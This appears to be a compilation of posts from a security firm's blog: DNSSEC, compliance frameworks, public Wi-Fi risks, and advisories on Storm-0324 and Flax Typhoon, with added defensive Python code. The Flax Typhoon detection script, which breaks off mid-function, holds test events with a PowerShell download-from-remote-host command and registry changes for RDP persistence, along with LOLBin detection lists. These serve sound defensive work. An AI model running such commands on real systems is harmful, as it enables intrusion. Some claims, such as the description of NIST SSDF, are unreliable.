Categories
General Cyber and IT Security Uncategorized

Understanding DNSSEC and DNS Security

In our increasingly interconnected world, where the digital landscape expands every day, safeguarding our online presence has become vital. One fundamental yet often overlooked aspect of online security is Domain Name System (DNS) security. DNS is the backbone of the internet, responsible for translating domain names into the IP addresses that computers use. To protect this system from threats, the Domain Name System Security Extensions (DNSSEC) play a pivotal role.

How DNS Works

DNS Attacks

DNS spoofing and DNS cache poisoning are malicious techniques aimed at manipulating the Domain Name System (DNS) to redirect users to fraudulent websites or compromise network security. DNS spoofing involves forging DNS responses to trick a user’s device into believing it has received legitimate information when, in reality, it’s been directed to a malicious site. This can lead to various security breaches, including phishing attacks. On the other hand, DNS cache poisoning involves corrupting a DNS server’s cache with fraudulent data. Once the cache is poisoned, the server can distribute this tainted information to users, redirecting them to attacker-controlled websites. Both DNS spoofing and cache poisoning are serious threats to the integrity of the DNS infrastructure that highlight the importance of DNSSEC.

DNSSEC

DNSSEC is a suite of extensions to DNS that adds an extra layer of security by digitally signing DNS data. This verification process ensures that the data retrieved from DNS servers is authentic and hasn’t been tampered with by malicious actors. Here’s how it works:

  1. Signing Zone Data: DNSSEC involves signing zone data with cryptographic signatures. Each DNS record in a zone is signed using a private key.
  2. Public Key Distribution: The public key for each zone is published in a DNS record called the Delegation Signer (DS) record. This record is stored in the parent zone, creating a chain of trust. The public key is paired with a private key, which is typically stored offline; the private key produces the digital signatures that are published in DNS.
  3. Authentication: When a user’s device queries a DNS server for a domain, the server provides not only the requested data but also the corresponding digital signature. The user’s device uses the public key stored in the DS record to verify the signature’s authenticity.
  4. Validation: If the signature is valid, the DNSSEC client trusts the data it received, knowing it hasn’t been altered during transmission.
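The parent-to-child link in step 2, worked in code: this is an added example (not from the original article) that builds the DS digest and key tag for a constructed, placeholder DNSKEY record and runs the check a validating resolver performs when it compares the parent's DS record against the child's published DNSKEY. The key bytes, owner names and the `demo` helper are assumptions for illustration, not a real zone's data.

```python
import base64
import hashlib
import hmac
import struct

# DS digest types (RFC 4034 sec. 5.1.3, RFC 4509, RFC 6605). SHA-1 is kept only
# so legacy DS records can still be checked; new DS records should use 2 or 4.
DS_DIGEST_ALGS = {1: "sha1", 2: "sha256", 4: "sha384"}

# Constructed demo key: a 64-byte placeholder, NOT a real ECDSA P-256 public key.
# Flags 257 marks a Key Signing Key, protocol is always 3, algorithm 13 = ECDSAP256SHA256.
CONSTRUCTED_PUBKEY = bytes(range(64))
SAMPLE_DNSKEY = ("example.com. 3600 IN DNSKEY 257 3 13 "
                 + base64.b64encode(CONSTRUCTED_PUBKEY).decode())


def name_to_wire(name: str) -> bytes:
    """Canonical wire form of an owner name: lowercase labels, length-prefixed, root terminator."""
    wire = b""
    for label in name.rstrip(".").lower().split("."):
        if label:
            raw = label.encode("ascii")
            if len(raw) > 63:
                raise ValueError(f"label too long: {label!r}")
            wire += bytes([len(raw)]) + raw
    return wire + b"\x00"


def dnskey_rdata(flags: int, protocol: int, algorithm: int, pubkey: bytes) -> bytes:
    """DNSKEY RDATA as it appears on the wire (RFC 4034 sec. 2.1)."""
    return struct.pack("!HBB", flags, protocol, algorithm) + pubkey


def parse_dnskey(record: str):
    """Split a presentation-format DNSKEY line into (owner, rdata)."""
    fields = record.split()
    i = fields.index("DNSKEY")
    flags, protocol, algorithm = (int(x) for x in fields[i + 1:i + 4])
    pubkey = base64.b64decode("".join(fields[i + 4:]))  # key may be split over several fields
    return fields[0], dnskey_rdata(flags, protocol, algorithm, pubkey)


def key_tag(rdata: bytes) -> int:
    """RFC 4034 Appendix B key tag: the 16-bit checksum resolvers use to pick candidate keys."""
    ac = 0
    for i, b in enumerate(rdata):
        ac += b if i & 1 else b << 8
    ac += (ac >> 16) & 0xFFFF
    return ac & 0xFFFF


def ds_digest(owner: str, rdata: bytes, digest_type: int = 2) -> bytes:
    """digest = hash(canonical owner name | DNSKEY RDATA): the value the parent zone publishes."""
    h = hashlib.new(DS_DIGEST_ALGS[digest_type])
    h.update(name_to_wire(owner) + rdata)
    return h.digest()


def make_ds(owner: str, rdata: bytes, digest_type: int = 2) -> dict:
    """Build the DS RDATA fields the parent zone would publish for this child DNSKEY."""
    return {"key_tag": key_tag(rdata), "algorithm": rdata[3],
            "digest_type": digest_type, "digest": ds_digest(owner, rdata, digest_type)}


def ds_matches_dnskey(ds: dict, owner: str, rdata: bytes) -> bool:
    """The chain-of-trust check a validating resolver performs at each delegation."""
    if ds["digest_type"] not in DS_DIGEST_ALGS:
        return False  # unsupported digest type: this DS cannot authenticate anything
    if ds["key_tag"] != key_tag(rdata) or ds["algorithm"] != rdata[3]:
        return False
    # Constant-time compare; a DS for a different key or a different owner name fails here.
    return hmac.compare_digest(ds["digest"], ds_digest(owner, rdata, ds["digest_type"]))


def demo() -> dict:
    owner, rdata = parse_dnskey(SAMPLE_DNSKEY)
    ds = make_ds(owner, rdata)        # what the parent (com.) would publish for example.com
    tampered = rdata[:-1] + b"\x00"   # substituted key material, as an attacker might inject
    return {
        "key_tag": ds["key_tag"],
        "ds_hex": ds["digest"].hex(),
        "genuine_key_ok": ds_matches_dnskey(ds, "EXAMPLE.COM.", rdata),  # owner names are case-insensitive
        "tampered_key_ok": ds_matches_dnskey(ds, owner, tampered),
        "wrong_owner_ok": ds_matches_dnskey(ds, "example.org.", rdata),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```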

How DNSSEC Works:

Benefits of DNSSEC:

  1. Data Integrity: DNSSEC ensures that the DNS data remains unchanged, preventing attackers from redirecting users to malicious websites.
  2. Authentication: It guarantees that the data comes from a legitimate source, reducing the risk of DNS spoofing attacks.
  3. Trust Chain: By establishing a trust chain through DS records, DNSSEC enhances the security of the entire DNS hierarchy.

Challenges with DNSSEC:

While DNSSEC offers robust security, its adoption faces some challenges:

  1. Complex Implementation: DNSSEC implementation can be complex and may require significant effort. However, some DNS providers offer to enable DNSSEC as part of your DNS package.
  2. Compatibility: Not all DNS servers and clients support DNSSEC, which can lead to compatibility issues.
  3. Key Management: Managing cryptographic keys can be challenging and requires careful consideration.
  4. Increased Packet Size: DNSSEC can result in larger DNS responses, which may impact network performance.

Other DNS Security Options:

DNSSEC is a cornerstone of DNS security, but several other extensions complement it:

  1. DNS-based Authentication of Named Entities (DANE): DANE allows domain owners to associate their TLS certificates with DNS records, improving the security of encrypted connections.
  2. Response Policy Zones (RPZ): RPZ enables DNS servers to block or redirect requests to known malicious domains.
  3. DNS-over-HTTPS (DoH) and DNS-over-TLS (DoT): These protocols encrypt DNS traffic, preventing eavesdropping and manipulation.

In conclusion, DNSSEC is an essential component of our digital defense. DNSSEC provides a robust framework for ensuring the integrity and authenticity of DNS data. The benefits of a more secure and trustworthy internet make the adoption of DNS security extensions a worthy investment in our digital future.


Categories
General Cyber and IT Security

The Building Blocks of Cyber Defense: Why Your Business Needs a Cybersecurity Framework

Let’s talk about something that’s as essential to your business as a solid foundation is to a skyscraper: Cybersecurity Frameworks. Trust me, this is the blueprint you didn’t know you needed.

What’s a Cybersecurity Framework and Why It’s Your New BFF?

Think of a cybersecurity framework as your business’s recipe for Grandma’s secret sauce. It’s a step-by-step guide that helps you mix the right ingredients in the right order to cook up some top-notch cybersecurity.  A framework offers a common language that allows businesses to understand, manage, and reduce cybersecurity risks effectively.

  • The Universal Translator: Imagine you’re at a United Nations meeting, but for cybersecurity. A framework is the translator that helps everyone speak the same language, making sure you and your partners are on the same page.
  • The GPS for Your Cyber Journey: It’s like having a GPS that not only tells you how to get from point A to point B but also warns you about roadblocks and speed traps along the way.
  • The Health Checkup: Just like you’d go to a doctor for a health checkup, a cybersecurity framework gives your business a thorough examination to spot any weak points before they become major issues.

Popular Cybersecurity Frameworks

1. CIS Controls v8: The Center for Internet Security (CIS) Controls v8 provides a prioritized set of actions to help organizations defend against cyber threats. It is a flexible framework suitable for various industries, emphasizing a risk-based approach.

Industry Applicability: CIS Controls can be applied across various industries, making it a versatile choice. Whether you’re a small business or a large corporation, CIS Controls offers a strong cybersecurity foundation.

Why Choose CIS Controls: CIS Controls are known for their simplicity and effectiveness. They provide actionable steps that organizations can implement to strengthen their cybersecurity posture. Moreover, they are regularly updated to address emerging threats.

2. NIST CSF: The National Institute of Standards and Technology (NIST) Cybersecurity Framework offers guidelines for organizations to improve their cybersecurity posture. It’s especially relevant to critical infrastructure sectors.

Industry Applicability: Critical infrastructure sectors such as energy, healthcare, and finance find the NIST CSF particularly valuable due to its sector-specific adaptation.

Why Choose NIST CSF: NIST CSF is a comprehensive framework that aligns well with industry-specific regulations and standards. It helps organizations identify, protect, detect, respond to, and recover from cybersecurity incidents, making it a holistic choice.

3. NIST 800-171: NIST 800-171 safeguards Controlled Unclassified Information (CUI) and is mandated for government contractors. It’s crucial for industries handling sensitive government data.

Industry Applicability: Government contractors, suppliers, and subcontractors dealing with CUI must adhere to NIST 800-171 to maintain government contracts.

Why Choose NIST 800-171: If your business is involved in government contracting or collaborates with federal agencies, NIST 800-171 is a legal requirement. Implementing this framework ensures compliance and security in handling CUI.

4. CMMC Levels 1 and 2: The Cybersecurity Maturity Model Certification (CMMC) focuses on protecting Controlled Unclassified Information (CUI) within the defense industry supply chain.

Industry Applicability: Mandatory for defense industry contractors handling CUI, CMMC Levels 1 and 2 lay the foundation for robust cybersecurity in this sector.

Why Choose CMMC Levels 1 and 2: If your business is involved in defense contracts or part of the supply chain, compliance with CMMC Levels 1 and 2 is essential for contract eligibility. These levels provide fundamental cybersecurity controls.

5. NIST Security and Privacy Framework (NIST SSDF): NIST SSDF combines security and privacy considerations, helping organizations address both aspects simultaneously.

Industry Applicability: Suitable for organizations prioritizing privacy alongside security, particularly those handling sensitive personal information. Industries such as healthcare and finance benefit from this dual-focus framework.

Why Choose NIST SSDF: NIST SSDF simplifies the integration of security and privacy practices. This framework streamlines compliance efforts and protects customer data in an era of increasing data privacy regulations.

6. ISO 27001/2: ISO 27001 is a globally recognized information security management system (ISMS) standard. It applies to organizations of all sizes and industries.

Industry Applicability: ISO 27001 is versatile and can be implemented by any organization seeking a comprehensive cybersecurity framework. It is often chosen by multinational corporations and organizations seeking a universally recognized certification.

Why Choose ISO 27001: ISO 27001 is renowned for its global recognition and flexibility. It allows organizations to customize their security controls to meet their needs while adhering to international best practices.

7. SOC2: Service Organization Control (SOC) 2 focuses on controls relevant to data security, availability, processing integrity, confidentiality, and customer data privacy.

Industry Applicability: Service providers, including cloud and SaaS companies, commonly adopt SOC 2 to assure clients of their security measures.

Why Choose SOC 2: SOC 2 is crucial for service providers as it builds customer trust. It demonstrates your commitment to protecting their data, making it a competitive advantage in the market.

8. GDPR: The General Data Protection Regulation (GDPR) is a European regulation that governs personal data protection. It applies to organizations processing EU citizens’ data.

Industry Applicability: Essential for organizations handling European customer data or operating in the EU. Industries such as e-commerce, marketing, and healthcare are particularly affected.

Why Choose GDPR: GDPR compliance is not optional if you handle EU data. Non-compliance can result in hefty fines. Implementing GDPR measures also enhances data protection and customer trust.

9. FTC Safeguards Rule: The Federal Trade Commission (FTC) Safeguards Rule applies to financial institutions and requires them to implement security measures to protect consumer information.

Industry Applicability: Financial institutions must adhere to the FTC Safeguards Rule to safeguard customer data.

Why Choose FTC Safeguards Rule: Compliance is a legal obligation for financial institutions. By implementing these safeguards, you meet regulatory requirements and safeguard your customers’ financial information.

10. SEC Compliance: SEC Compliance involves adhering to the Securities and Exchange Commission’s regulations, including cybersecurity disclosure requirements.

Industry Applicability: Essential for publicly traded companies subject to SEC regulations, primarily in the finance and investment sectors.

Why Choose SEC Compliance: SEC compliance ensures transparency and accountability in financial markets. It helps protect investors and maintain the integrity of financial systems.

11. Cyber Essentials: Cyber Essentials is a UK government-backed certification scheme focusing on fundamental cybersecurity practices.

Industry Applicability: Suitable for small to medium-sized businesses seeking a cost-effective cybersecurity framework.

Why Choose Cyber Essentials: If you’re a smaller organization with limited resources, Cyber Essentials offers a practical and affordable way to establish basic cybersecurity measures and build a strong foundation.

12. CCPA: The California Consumer Privacy Act (CCPA) aims to protect the privacy of California residents and applies to organizations handling their personal information.

Industry Applicability: Necessary for businesses dealing with California residents’ data, particularly in the tech and retail sectors.

Why Choose CCPA: CCPA compliance is crucial for companies with a California customer base. It demonstrates a commitment to respecting consumer privacy and avoids costly penalties.

13. HIPAA: The Health Insurance Portability and Accountability Act (HIPAA) Security Rule applies to healthcare organizations handling protected health information (PHI).

Industry Applicability: Mandatory for healthcare providers and entities handling PHI.

Why Choose HIPAA Security: Compliance with HIPAA is a legal requirement and essential for safeguarding sensitive patient information. Non-compliance can result in severe penalties and damage to reputation.

14. PCI-DSS: The Payment Card Industry Data Security Standard (PCI DSS) is a set of security standards designed to ensure that organizations that accept, process, store, or transmit credit card information maintain a secure environment.

Industry Applicability: PCI DSS is particularly relevant to businesses in the retail, e-commerce, hospitality, and financial sectors that handle payment card data. It is essential for any organization that accepts credit card payments.

Why Choose PCI DSS: PCI DSS compliance is not just a best practice but often a contractual requirement enforced by credit card companies. Failure to comply can result in financial penalties and the loss of the ability to process credit card payments. Implementing PCI DSS measures protects sensitive customer data and enhances trust and credibility with customers.

Why You Can’t Afford to Skip This

Imagine you’re building a house. You wouldn’t start without a blueprint, right? Similarly, a cybersecurity framework is your blueprint for building a secure digital environment. It’s not just a nice-to-have; it’s a must-have. Here’s why:

  • Risk Mitigation: Operating without a framework is like driving without a GPS—you’re more likely to end up in a bad neighborhood. A framework helps you identify and prioritize risks, guiding you safely to your destination.
  • Trust Factor: In a world where data breaches make headlines, a recognized framework is your seal of approval. It tells your clients, partners, and stakeholders that you’re serious about security.
  • Regulatory Compliance: A framework is your roadmap to compliance, helping you avoid the pitfalls of hefty fines and legal troubles. It’s like having a lawyer in your pocket, guiding you through the complex legal landscape.
  • Competitive Edge: In a saturated market, a robust cybersecurity posture can set you apart. It’s like having a five-star safety rating in a world of three-star competitors.
  • Cost-Effective Prioritization: Frameworks enable you to allocate your limited resources wisely. It’s like having a financial advisor for your cybersecurity budget, ensuring you get the most bang for your buck.
  • Unified Communication: One of the key benefits of a framework is that it provides a common language for discussing cybersecurity issues. This enhances internal communication and can also improve your interactions with suppliers and partners.

So, a cybersecurity framework isn’t just a set of guidelines; it’s your strategic asset. It’s the VIP pass that not only gets you into the cybersecurity club but also helps you navigate it like a pro. 

Ready to Level Up Your Cybersecurity Game?

By adopting a framework, you’re not just ticking off a compliance checklist; you’re making a strategic business decision. It helps you cut through the noise, focus on what matters, and shows everyone that you’re a business that takes security seriously.

So, if you’re ready to take your cybersecurity to the next level, contact us and let us be your cybersecurity wingman. We offer several services including but not limited to 24/7 SOC monitoring, incident response, compliance assessments, customized program and policy development, pen testing and vulnerability management to fit your unique needs.

Categories
Cybersecurity Advisories

Storm-0324: New Phishing Campaign Targets Corporations via Teams Messages

Microsoft is warning of a new phishing campaign that uses Teams messages as lures to infiltrate corporate networks. The threat group behind this campaign, tracked as Storm-0324 (aka TA543 and Sagrid), is a financially motivated group known to gain initial access through email-based infection vectors and then hand off access to the compromised networks to other threat actors, which frequently leads to ransomware deployment. They are known to have deployed Sage and GandCrab ransomware in the past. Storm-0324 has also provided the well-known FIN7 (aka Sangria Tempest) cybercrime gang with access to corporate networks after compromising them using JSSLoader, Gozi, and Nymaim.

Storm-0324’s methods have changed over the years. As of July 2023, the phishing lures are sent over Teams with links leading to a malicious ZIP file hosted on SharePoint. To accomplish this, the group leverages an open-source tool called TeamsPhisher, a Python program that enables Teams tenant users to attach files to messages sent to external tenants, which attackers abuse to deliver phishing attachments. The accounts sending these lures are labelled “EXTERNAL” by the Teams platform if external access is enabled in the organization. The same weakness was previously exploited by APT29 in attacks against dozens of organizations, including government agencies worldwide. Details regarding the end goal of Storm-0324’s attacks have not been provided at this time; however, APT29’s attacks aimed to steal the targets’ credentials after tricking them into approving MFA prompts.

Microsoft says they are taking these phishing campaigns seriously and have rolled out several improvements to better defend against these threats. They have suspended identified accounts and tenants associated with inauthentic or fraudulent behavior. Microsoft has rolled out enhancements to the Accept/Block experience in one-on-one chats within Teams, to emphasize the externality of a user and their email address so Teams users can better exercise caution by not interacting with unknown or malicious senders. In addition to this, they’ve implemented new restrictions on the creation of domains within tenants and improved notifications to tenant admins when new domains are created within their tenant.

SecurIT360 SOC Managed Services 

If you utilize our SOC Managed Services for MDR and/or EDR, we are actively monitoring the release of IoCs related to this threat actor. Along with standard vendor threat feed and signature updates, we will proactively upload these to our SOC tools if applicable.

As always, if we detect activity related to this campaign, we will alert you if warranted.

Please feel free to contact the SOC via email (soc@securit360.com) or telephone (844-474-1244) if you have any questions or concerns. 

Ongoing Storm-0324 and Sangria Tempest JSSLoader email-based infection chain

Recommendations

As per Microsoft, to harden networks against Storm-0324 attacks, defenders are advised to implement the following:

  • Pilot and start deploying phishing-resistant authentication methods for users.
  • Implement Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
  • Specify trusted Microsoft 365 organizations to define which external domains are allowed or blocked to chat and meet.
  • Keep Microsoft 365 auditing enabled so that audit records can be investigated if required.
  • Understand and select the best access settings for external collaboration for your organization.
  • Allow only known devices that adhere to Microsoft’s recommended security baselines.
  • Educate users about social engineering and credential phishing attacks, including refraining from entering MFA codes sent via any form of unsolicited messages.
    • Educate Microsoft Teams users to verify ‘External’ tagging on communication attempts from external entities, be cautious about what they share, and never share their account information or authorize sign-in requests over chat.
  • Educate users to review sign-in activity and mark suspicious sign-in attempts as “This wasn’t me”.
  • Implement Conditional Access App Control in Microsoft Defender for Cloud Apps for users connecting from unmanaged devices.
  • Configure Microsoft Defender for Office 365 to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Microsoft Office applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect your organization from malicious links that are used in phishing and other attacks.
  • Enable Zero-hour auto purge (ZAP) in Microsoft Office 365 to quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.
  • Practice the principle of least privilege and maintain credential hygiene. Avoid the use of domain-wide, administrator-level service accounts. Restricting local administrative privileges can help limit installation of RATs and other unwanted applications.
  • Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • For additional recommendations on hardening your organization against ransomware attacks, refer to the threat overview on human-operated ransomware.

Microsoft customers can turn on attack surface reduction rules to prevent common attack techniques:

Resources & Related Articles

Categories
General Cyber and IT Security

Public Wi-Fi: The Double-Edged Sword of Connectivity and Cybersecurity

The appeal of free public Wi-Fi is inescapable in today’s digital world. The ability to connect, work, and socialize from any location – be it a local café, an airport lounge, or a hotel lobby – is a convenience that many have come to rely on. However, this convenience is not without its risks. As the digital landscape evolves, so do the threats associated with public Wi-Fi networks. Public Wi-Fi has become a staple in our daily lives. With the surge in remote work and the digital nomad lifestyle, the need to stay connected while on the move has never been greater. Yet, a staggering 56% of individuals connect to public Wi-Fi networks without a password, as reported by Forbes Advisor. This seemingly harmless act can expose users to a myriad of cyber threats. 

Below are a few attack vectors that cyber criminals can use to access users’ digital information using public Wi-Fi.

  • Evil Twin (Rogue Access Point) – Cybercriminals often set up counterfeit Wi-Fi networks with an SSID (Service Set Identifier) resembling legitimate ones. Unsuspecting users, thinking they’re connecting to a genuine network, inadvertently expose their data to these rogue hotspots. After a user connects to an Evil Twin, all data sent over the network can be seen by the attacker.
  • Man-in-the-Middle (MITM) Attacks – In these attacks a threat actor, who is on the same public network you connect to, intercepts packets sent between your computer and the internet. Similar to eavesdropping, this allows attackers to view and manipulate data.
  • Session Hijacking and Sidejacking – This occurs when the attacker is able to steal a legitimate session ID from a user to “hijack” the user’s session. For instance, a user may log into their bank account on public Wi-Fi. Simultaneously, the attacker will capture the information in the session cookie and use it to impersonate the user after they are done with their banking activity.
  • Login Page Phishing – Some public Wi-Fi login pages may prompt users to enter information to log in securely. This may be leveraged by attackers using a phishing attack to obtain credentials. For example, an attacker may redirect a user attempting to access a public Wi-Fi point to a phishing page requesting that the user log in through Facebook. If the user enters their Facebook credentials, they are passed to the attacker, who can then use them.
  • Unencrypted Public Wi-Fi – By default most access points are set up with WPA2 encryption enabled. However, if encryption is disabled on the Wi-Fi access point, information sent over the network can be viewed by attackers connected to the network.
  • Malware Distribution – Attackers can use public Wi-Fi to prompt a user to download or install a malicious program that may log keystrokes, or enable remote access to a user’s computer.

Public Wi-Fi Best Practices

In most cases, the most secure action would be to avoid public Wi-Fi. A low-cost alternative is to connect to a personal mobile hotspot. However, if one must connect to a public hotspot, here are some best practices.

  • Ensure that you are connecting to a legitimate Wi-Fi access point. Usually, this can be confirmed by asking an employee what the SSID for their Wi-Fi is.
  • When connecting to a public Wi-Fi access point, use a VPN to encrypt your data in transit over the network.
  • Disable auto-connecting to Wi-Fi networks.
  • Avoid accessing your personal financial information or work information while using untrusted public Wi-Fi.
  • Only access HTTPS sites to ensure an SSL/TLS connection with the webpage.
  • Enable anti-virus and anti-malware software on your computer.
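An added example (not part of the original post) showing how the evil-twin and unencrypted-network risks described above can be surfaced from a Wi-Fi scan before connecting: it audits a constructed scan list against the SSID the venue staff gave you, flagging open access points that broadcast the trusted name alongside encrypted ones and look-alike SSIDs. The scan records, the `CafeNet` name and the similarity thresholds are assumptions for illustration.

```python
import re

OPEN = "--"  # how the constructed scanner marks a network with no encryption

# Constructed scan results (SSID, BSSID, security); not a real site survey.
# The cafe's staff told us the real network is "CafeNet".
CONSTRUCTED_SCAN = [
    ("CafeNet",      "aa:bb:cc:00:00:01", "WPA2"),
    ("CafeNet",      "aa:bb:cc:00:00:02", "WPA2"),  # second legitimate AP, same security
    ("CafeNet",      "de:ad:be:ef:00:01", OPEN),    # same name but unencrypted: evil twin candidate
    ("CafeNet Free", "de:ad:be:ef:00:02", OPEN),    # look-alike name, unencrypted
    ("Cafe-Net",     "de:ad:be:ef:00:03", "WPA2"),  # look-alike name
    ("AirportGuest", "11:22:33:44:55:66", OPEN),    # unrelated open network, not flagged
]

# Digit-for-letter swaps commonly used to make one name pass for another.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "|": "l"})


def normalize_ssid(ssid: str) -> str:
    """Drop case, separators and digit look-alikes so 'Cafe-Net' and 'CAFENET' compare equal."""
    return re.sub(r"[^a-z0-9]", "", ssid.lower()).translate(HOMOGLYPHS)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one-character variants such as 'CafeNett'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def looks_like(candidate: str, trusted: str) -> bool:
    """True when a differently spelled SSID would plausibly be mistaken for the trusted one."""
    c, t = normalize_ssid(candidate), normalize_ssid(trusted)
    if not c or not t:
        return False
    return c == t or c.startswith(t) or t.startswith(c) or edit_distance(c, t) <= 1


def audit_scan(scan, trusted_ssid: str):
    """Return (bssid, ssid, reason) for every access point worth avoiding."""
    findings = []
    same_name = [rec for rec in scan if rec[0] == trusted_ssid]
    has_encrypted = any(sec != OPEN for _, _, sec in same_name)
    for ssid, bssid, sec in scan:
        if ssid == trusted_ssid:
            if sec == OPEN and has_encrypted:
                findings.append((bssid, ssid, "open AP using the trusted SSID next to encrypted ones: possible evil twin"))
            elif sec == OPEN:
                findings.append((bssid, ssid, "trusted network is unencrypted: traffic readable by anyone in range"))
        elif looks_like(ssid, trusted_ssid):
            prefix = "open " if sec == OPEN else ""
            findings.append((bssid, ssid, f"{prefix}look-alike of the trusted SSID"))
    return findings


if __name__ == "__main__":
    for bssid, ssid, reason in audit_scan(CONSTRUCTED_SCAN, "CafeNet"):
        print(f"{bssid}  {ssid!r:16} {reason}")
```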

Categories
Cybersecurity Advisories

Flax Typhoon APT Group Using LOLBins for Cyber Espionage

A China-backed hacking group, tracked as Flax Typhoon, is targeting government agencies and education, critical manufacturing, and information technology organizations, likely for espionage purposes. The nation-state actor intends to perform espionage and maintain access to organizations across a broad range of industries for as long as possible; however, final objectives in this campaign have not been observed. Currently, Taiwanese organizations are exclusively being affected, but the full scope of the attacks isn’t known. Microsoft states that the distinctive pattern of malicious activity could easily be reused in other operations outside the region and would benefit from broader industry visibility. Because of this, enterprises beyond Taiwan should be on alert.

Flax Typhoon has been active since mid-2021 and focuses on persistence, lateral movement, and credential access. The threat actors do not primarily rely on malware to gain and maintain access to the victim network; instead, they prefer components already available on the operating system (LOLBins) and legitimate software. In the campaign observed, Flax Typhoon gained initial access by exploiting known vulnerabilities in public-facing servers, including VPN, web, Java, and SQL applications. The threat actors dropped China Chopper, a powerful web shell that provides remote code execution capabilities. If necessary, the hackers elevate their privileges to administrator level using the publicly available ‘Juicy Potato’ and ‘BadPotato’ open-source tools, which exploit known vulnerabilities to obtain higher permissions.

Flax Typhoon establishes persistence by turning off Network Level Authentication (NLA) through registry modifications and abusing the Windows Sticky Keys accessibility feature to set up an RDP connection. To get around restrictions on RDP connectivity to the internal network, Flax Typhoon installs a legitimate VPN bridge to maintain the link between the compromised system and its external server. The attackers download the open-source SoftEther VPN client using LOLBins such as the PowerShell Invoke-WebRequest utility, certutil, or bitsadmin, and abuse various built-in Windows tools to make the VPN application launch automatically at system startup. To avoid detection, they rename it after legitimate Windows components such as ‘conhost.exe’ or ‘dllhost.exe’. Additionally, Flax Typhoon uses SoftEther’s VPN-over-HTTPS mode to disguise VPN traffic as standard HTTPS traffic.

Researchers have noted that Flax Typhoon frequently uses the Mimikatz tool to extract credentials from LSASS process memory and the SAM registry hive. The stolen credentials were not observed being used to extract additional data, leaving the adversary’s main objective unclear for now.

Flax Typhoon Attack Chain

SecurIT360 SOC Managed Services 

If you utilize our SOC Managed Services, here are the actions we are taking to help detect this activity: 

MDR Services 

  • We utilize several threat feeds that are updated daily.
  • In addition to our automatic threat feeds, we have added indicators related to known malicious threat actors into our MDR solution, FortiSIEM.

EDR Services 

  • In addition to ongoing vendor IoC updates, we have implemented known IoC information to help with detection. 

Indicators are provided in the Indicators of Compromise section below for your reference.

As always, if we detect activity related to these exploits, we will alert you when applicable. 

Mitigation & Protection

  • Defending against techniques used by Flax Typhoon begins with vulnerability and patch management, particularly on systems and services exposed to the public internet. The credential access techniques used can also be mitigated with proper system hardening.
  • Affected organizations need to assess the scale of Flax Typhoon activity in their network, remove malicious tools and C2 infrastructure, and check logs for signs of compromised accounts that may have been used for malicious purposes.

Recommendations

  • Microsoft recommends that organizations apply the latest security updates to internet-exposed endpoints and public-facing servers, and that MFA be enabled on all accounts.
  • Registry monitoring can help catch modification attempts and unauthorized changes like those performed by Flax Typhoon to disable NLA.
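An added detection example (not from the advisory or from Microsoft) covering the persistence and masquerading behaviour described above together with the registry-monitoring recommendation: it triages constructed Sysmon-style registry and process-creation events for the NLA registry change, a Sticky Keys debugger hijack, system binary names running outside System32, and LOLBin downloads. The registry value paths come from public Windows documentation rather than from the advisory; the events, timestamps, the 203.0.113.5 documentation address and the OriginalFileName values are constructed.

```python
import ntpath
import re

# Sysmon-style events reconstructed as dicts; every value below is constructed for
# this example (203.0.113.5 is a documentation address, OriginalFileName values are made up).
CONSTRUCTED_EVENTS = [
    {"EventID": 13, "UtcTime": "2023-08-24 10:01:02", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\UserAuthentication",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "UtcTime": "2023-08-24 10:01:09", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger",
     "Details": r"C:\ProgramData\helper.exe"},
    {"EventID": 1, "UtcTime": "2023-08-24 10:02:00", "Image": r"C:\Windows\System32\conhost.exe",
     "OriginalFileName": "CONHOST.EXE", "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0x4"},  # benign
    {"EventID": 1, "UtcTime": "2023-08-24 10:05:31",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"powershell.exe -c Invoke-WebRequest https://203.0.113.5/svc.bin -OutFile C:\ProgramData\svc.bin"},
    {"EventID": 1, "UtcTime": "2023-08-24 10:06:12", "Image": r"C:\ProgramData\conhost.exe",
     "OriginalFileName": "vpnclient.exe", "CommandLine": r"C:\ProgramData\conhost.exe /start"},
    {"EventID": 1, "UtcTime": "2023-08-24 10:07:45", "Image": r"C:\Windows\System32\svchost.exe",
     "OriginalFileName": "svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},  # benign
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
MASQUERADE_NAMES = {"conhost.exe", "dllhost.exe"}  # names the advisory says SoftEther was renamed to
LOLBIN_DOWNLOADERS = {"certutil.exe", "bitsadmin.exe", "powershell.exe", "pwsh.exe"}
ACCESSIBILITY_BINS = {"sethc.exe"}  # Sticky Keys; extend with other accessibility helpers as needed
NLA_VALUE = r"\control\terminal server\winstations\rdp-tcp\userauthentication"
IFEO_PREFIX = "\\image file execution options\\"


def check_registry(ev: dict):
    """Sysmon EID 13 (SetValue): a reason string if the write matches a Flax Typhoon persistence step."""
    target = ev["TargetObject"].lower()
    if target.endswith(NLA_VALUE) and "0x00000000" in ev.get("Details", "").lower():
        return "NLA disabled for RDP (UserAuthentication set to 0)"
    if IFEO_PREFIX in target and target.endswith("\\debugger"):
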